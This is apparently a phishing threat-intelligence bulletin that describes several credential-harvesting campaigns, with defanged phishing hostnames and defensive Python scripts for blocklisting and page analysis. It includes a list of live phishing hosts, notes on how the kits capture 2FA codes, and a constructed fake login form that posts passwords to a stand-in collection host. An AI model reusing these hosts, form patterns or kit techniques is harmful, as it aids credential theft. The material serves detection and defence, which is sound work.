Phish Wire - May 27 2025
- Updated on 27 May 2025
- 3 Minutes to read
A significant increase in advanced zero-day phishing campaigns was observed in mid-May 2025, targeting social media, e-commerce, corporate email, telecommunications, and streaming services. Attackers abused legitimate cloud services and compromised infrastructure, from professional learning platforms to web hosting and cloud application environments, to lend credibility to their phishing pages. The examples and highlights below are drawn from those campaigns; hostnames are defanged with [.] so they cannot be clicked by accident.
- manage[.]nay[.]qxk[.]mybluehost[.]me
- googleiinfluencerhub[.]ct[.]ws
- czoin[.]dzdyf[.]es
- newspaceitenow[.]tech/Gran1/
- sign[.]account[.]srver[.]at[.]bel[.]0auth[.]165-154-199-230[.]cprapid[.]com
- my-php-app-production-7f57[.]up[.]railway[.]app
- log-in[.]billing-information[.]netflix-id[.]cc[.]valterjavaroni[.]com[.]br
- greatbtinternet[.]in/vparty/
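The indicators above are defanged, so they have to be refanged before they can be fed to a proxy, DNS filter or log search. The following script is an added example, not part of this Phish Wire issue: it refangs the list, splits each indicator into host and path, flags the indicators that sit under a shared hosting parent (up.railway.app, cprapid.com, mybluehost.me, where only the exact phishing host can be blocked without hitting other tenants), and matches the result against proxy log lines. The log format ("timestamp client method url"), the SHARED_PARENTS set and the SAMPLE_LOG lines are all constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Defanged indicators exactly as listed in this Phish Wire issue.
IOCS = [
    "manage[.]nay[.]qxk[.]mybluehost[.]me",
    "googleiinfluencerhub[.]ct[.]ws",
    "czoin[.]dzdyf[.]es",
    "newspaceitenow[.]tech/Gran1/",
    "sign[.]account[.]srver[.]at[.]bel[.]0auth[.]165-154-199-230[.]cprapid[.]com",
    "my-php-app-production-7f57[.]up[.]railway[.]app",
    "log-in[.]billing-information[.]netflix-id[.]cc[.]valterjavaroni[.]com[.]br",
    "greatbtinternet[.]in/vparty/",
]

# Shared parents named in the report (assumed set). Each hosts many legitimate
# tenants, so the block must be the exact phishing host, never the parent.
SHARED_PARENTS = ("up.railway.app", "cprapid.com", "mybluehost.me")

# Proxy log format assumed for the example: "<timestamp> <client> <method> <url>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)$")


def refang(ioc):
    """Reverse the defanging used above so the indicator can be matched."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def split_ioc(ioc):
    """Return (host, path) for an indicator; path is '/' when the IOC is host-only."""
    parts = urlsplit("//" + refang(ioc))
    return parts.hostname, parts.path or "/"


def shared_parent(ioc):
    """Return the shared hosting parent an indicator sits under, or None."""
    host, _ = split_ioc(ioc)
    for parent in SHARED_PARENTS:
        if host.endswith("." + parent):
            return parent
    return None


def build_blocklist(iocs=IOCS):
    """Map each exact host to the (path, original indicator) pairs to block."""
    blocklist = {}
    for ioc in iocs:
        host, path = split_ioc(ioc)
        blocklist.setdefault(host, []).append((path, ioc))
    return blocklist


def match_logs(log_lines, iocs=IOCS):
    """Return (timestamp, client, indicator) for every log line that hit an IOC.

    The host must match exactly (a sibling tenant on the same shared parent is
    not a hit); when the indicator carries a path, the request path must start
    with it, which keeps a compromised site's legitimate pages out of the hits.
    """
    blocklist = build_blocklist(iocs)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        url = urlsplit(m.group("url"))
        host = url.hostname or ""          # urlsplit lowercases the hostname
        for path, ioc in blocklist.get(host, []):
            if path == "/" or (url.path or "/").startswith(path):
                hits.append((m.group("ts"), m.group("client"), ioc))
                break
    return hits


# Constructed sample log lines (not from the report) covering the cases above:
# a sibling Railway tenant and a non-phishing path on greatbtinternet.in must not match.
SAMPLE_LOG = [
    "2025-05-21T14:02:11Z 10.1.4.22 GET https://log-in.billing-information.netflix-id.cc.valterjavaroni.com.br/account/billing",
    "2025-05-15T09:17:40Z 10.1.7.9 GET https://my-php-app-production-7f57.up.railway.app/",
    "2025-05-15T09:18:02Z 10.1.7.9 GET https://docs-team-production.up.railway.app/api",
    "2025-05-21T16:40:05Z 10.1.2.3 GET http://greatbtinternet.in/vparty/index.php",
    "2025-05-21T16:41:00Z 10.1.2.3 GET http://greatbtinternet.in/blog/",
    "2025-05-18T11:00:00Z 10.1.5.5 GET https://MANAGE.nay.qxk.mybluehost.me/amazon/",
]

if __name__ == "__main__":
    for ioc in IOCS:
        parent = shared_parent(ioc)
        note = f" (exact-host block only; parent {parent} is shared)" if parent else ""
        print(f"block {split_ioc(ioc)[0]}{note}")
    for ts, client, ioc in match_logs(SAMPLE_LOG):
        print(f"{ts} {client} hit {ioc}")
```

Path matching is deliberate for the two indicators that carry one: on a compromised legitimate site only the kit's directory is malicious. For a domain the attacker registered outright it is reasonable to drop the path and block the whole host.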
Google Influencer
On May 11, a Texas user clicked on this Instagram phishing attack on their work device. The threat actors created a fake "Google Influencer Hub" page to harvest Instagram users' login credentials.
In this instance, the phishing email came from the personal Gmail account of the staff member's spouse, which had been compromised. The phishing email contained a link to a password protected The scam likely deceived users by promising a Google-sponsored influencer program, tricking them into entering their Instagram credentials. Once entered, the page's script captures the username and password and submits them to the attacker's server. Such lures are often delivered through the Instagram app itself, bypassing corporate email security.
The attack also includes a 2FA prompt stage, which asks the user for a 6-digit code after they enter their password, so a one-time code on the account does not by itself stop the takeover.
Office 365 and Okta Spearphish
In late May, a Kentucky employee clicked on the Microsoft spearphish below.
This attack targeted Microsoft Office 365 credentials, using a phishing page hosted on czoin[.]dzdyf[.]es (a domain under Spain's .es ccTLD). References to Okta in the page's HTML suggest that the kit also integrates Okta login elements, so the same page can be aimed at Okta-federated tenants.
“Adobe Document Cloud” Spearphish
In mid-May, a staff member at an Idaho organization clicked on a phishing attack disguised as an "Adobe Document Cloud" document.
The original phishing page presented an Adobe Document Viewer, prompting the user to select their email type (Outlook, in this case). The page even reassures the user: "We'll never share your email with anyone else."
The phishing kit behind this page catered to several email providers, including Outlook, Yahoo, AOL, Office 365, and “Other Mail” options.
A similar kit to the one on newspaceitenow[.]tech/Gran1/ was observed a week later, on May 21, at greatbtinternet[.]in/vparty/, targeting a user in Kentucky.
AT&T Wireless Login Phish on cPanel Site
On May 13th, an Idaho employee clicked on the AT&T phishing attack below on their work device.
Attacks targeting AT&T customers are often delivered by SMS messages that mimic AT&T's regular communications, including service updates and marketing promotions. Once an AT&T account is compromised, the attacker can access device and billing information and manage SIM cards and eSIMs, which opens the door to a SIM swap and, from there, to intercepting SMS-delivered one-time codes for the victim's other accounts.
Microsoft Spearphish on the Railway Cloud App
On May 15th, a user at a Minnesota organization clicked the Microsoft spearphish below.
This attack was hosted on the Railway.app cloud platform, which provides free hosting for web applications. By deploying on Railway.app, the attacker inherited the reputation of the legitimate up.railway.app parent domain, which cannot be blocked wholesale without affecting other tenants. The text on this phishing page reads: "Because you're accessing sensitive info, you need to verify your password," which mirrors Microsoft's own wording when it asks users to reconfirm credentials before sensitive account changes.
Netflix Billing Phish via Compromised Brazilian Site
On May 21, an employee at an organization in Colorado clicked on a phishing email related to Netflix billing.
The attack is hosted on the domain of a legitimate Brazilian business, which was likely compromised and is unwittingly hosting the phishing page. Because the page borrows the reputation of an established third-party domain, reputation-based filtering can easily miss it.
Amazon Phish on Spoofed Hosting
On May 18th, another Texas staff member clicked on the Amazon phishing attack below on their work device.
The mybluehost[.]me hostname borrows Bluehost branding (the hosting provider's own domain is bluehost.com), whether as a lookalike or as a provider-issued temporary site name; either way the brand name lends a throwaway subdomain credibility. Examples like this highlight the risks associated with users accessing personal email accounts on work devices.
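Several of the pages above share one tell: a brand's name appears in the page content or in the hostname (Okta and Office 365 markers in the czoin[.]dzdyf[.]es kit, the provider picker on the "Adobe Document Cloud" page, "netflix-id" inside a Brazilian business's domain, "bluehost" inside mybluehost[.]me) while the page is served from a domain that brand does not own. The script below is an added example, not part of this Phish Wire issue or of any vendor's product: it parses a fetched login page, collects visible text plus id/class/name attribute values (where kit fingerprints such as an Okta widget id surface), and reports brand/host mismatches and forms that post credentials off-site. The BRAND_DOMAINS allowlist, the two-label public-suffix shortcut, and every HTML sample in SAMPLES are constructed assumptions modelled on the descriptions above, not captured content.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Brand tokens that appear in the kits above, mapped to the registrable domains a
# genuine login for that brand is served from. Assumed allowlist for the example,
# not a complete inventory of any vendor's domains.
BRAND_DOMAINS = {
    "okta": {"okta.com", "oktapreview.com"},
    "office 365": {"microsoft.com", "microsoftonline.com", "office.com", "live.com"},
    "outlook": {"microsoft.com", "microsoftonline.com", "office.com", "live.com"},
    "adobe": {"adobe.com"},
    "netflix": {"netflix.com"},
    "bluehost": {"bluehost.com"},
    "instagram": {"instagram.com"},
    "google": {"google.com"},
    "amazon": {"amazon.com"},
}

# Minimal public-suffix handling (assumption): x.com.br / x.co.uk keep three
# labels, everything else two. Use a real public suffix list in production.
SECOND_LEVEL = {"com", "co", "net", "org", "gov", "edu"}


def registrable_domain(host):
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and len(labels[-1]) == 2 and labels[-2] in SECOND_LEVEL:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


class LoginPageParser(HTMLParser):
    """Collect form targets, password inputs, visible text and id/class/name/alt
    values; kit fingerprints such as Okta widget ids live in the attributes."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.password_fields, self.text = [], 0, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        self.text.extend(v for k, v in a.items() if v and k in ("id", "class", "name", "alt"))

    def handle_data(self, data):
        self.text.append(data)


def assess_page(page_url, html):
    """Return findings for one page; an empty list means no brand/host mismatch."""
    host = (urlsplit(page_url).hostname or "").lower()
    page_domain = registrable_domain(host)
    parser = LoginPageParser()
    parser.feed(html)
    blob = " ".join(parser.text).lower()
    findings = []
    for brand, legit in BRAND_DOMAINS.items():
        token = brand.replace(" ", "")
        in_host = len(token) >= 5 and token in host.replace("-", "")  # netflix-id, mybluehost
        if (in_host or brand in blob) and page_domain not in legit:
            where = "hostname" if in_host else "page content"
            findings.append(f"{brand} branding in {where} but served from {page_domain}")
    for action in parser.form_actions:  # where do the credentials actually go?
        target = urlsplit(action).hostname
        if target and registrable_domain(target) != page_domain:
            findings.append(f"credentials posted off-site to {target}")
    if findings and parser.password_fields == 0:
        findings.append("no password field: a pre-stage (provider picker or 2FA prompt)")
    return findings


# Constructed HTML modelled on the kits described above; none of it is captured content.
SAMPLES = {
    "https://czoin.dzdyf.es/login": (
        '<title>Sign in to your Office 365 account</title><div id="okta-sign-in">'
        '<form method="post" action="/post.php"><input type="email" name="login">'
        '<input type="password" name="passwd"><button>Sign in</button></form></div>'),
    "http://newspaceitenow.tech/Gran1/": (
        '<h2>Adobe Document Cloud</h2><form action="send.php"><select name="provider">'
        '<option>Outlook</option><option>Yahoo</option><option>AOL</option>'
        '<option>Office 365</option><option>Other Mail</option></select></form>'
        "<small>We'll never share your email with anyone else.</small>"),
    "https://log-in.billing-information.netflix-id.cc.valterjavaroni.com.br/": (
        '<h1>Update your Netflix billing information</h1><form method="post" '
        'action="https://collect.example.net/p.php"><input name="email">'
        '<input type="password" name="pw"></form>'),
    "https://manage.nay.qxk.mybluehost.me/amazon/": (
        '<h1>Amazon Sign-In</h1><form method="post" action="login.php">'
        '<input type="password" name="password"></form>'),
    "https://login.microsoftonline.com/common/oauth2": (  # genuine-domain control
        '<h1>Sign in to Outlook / Office 365</h1><form method="post" action="/common/login">'
        '<input type="password" name="passwd"></form>'),
}

if __name__ == "__main__":
    for url, html in SAMPLES.items():
        print(url, "->", assess_page(url, html) or ["clean"])
```

The control entry on login.microsoftonline.com shows the point of the allowlist: the same Office 365 and Outlook text produces no finding when the registrable domain belongs to the brand. The "no password field" note is what you would expect from the first stage of the Adobe kit (the provider picker) or the 2FA prompt of the Google Influencer kit; it tells an analyst that the capture happens on a later page.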
Mitigations
- Block the domains listed above on corporate firewalls, DNS filters, and endpoint security solutions. Block the exact phishing host: several of them sit under shared parents (up.railway.app, cprapid.com, mybluehost.me, a compromised business's domain) that serve legitimate content and cannot be blocked wholesale.
- Educate users about phishing delivered through file-sharing and document notifications outside email, such as the fake "Adobe Document Cloud" page above.
- Remind users of the phishing risks associated with their personal accounts, even when accessed on corporate devices.
- Enforce multi-factor authentication (MFA) for all corporate logins to limit the impact of a stolen password, and prefer phishing-resistant methods (FIDO2/WebAuthn security keys or passkeys) over SMS or app-generated codes: a kit that prompts for the 6-digit code, as the Google Influencer page does, captures it along with the password, and SIM swaps defeat SMS delivery outright.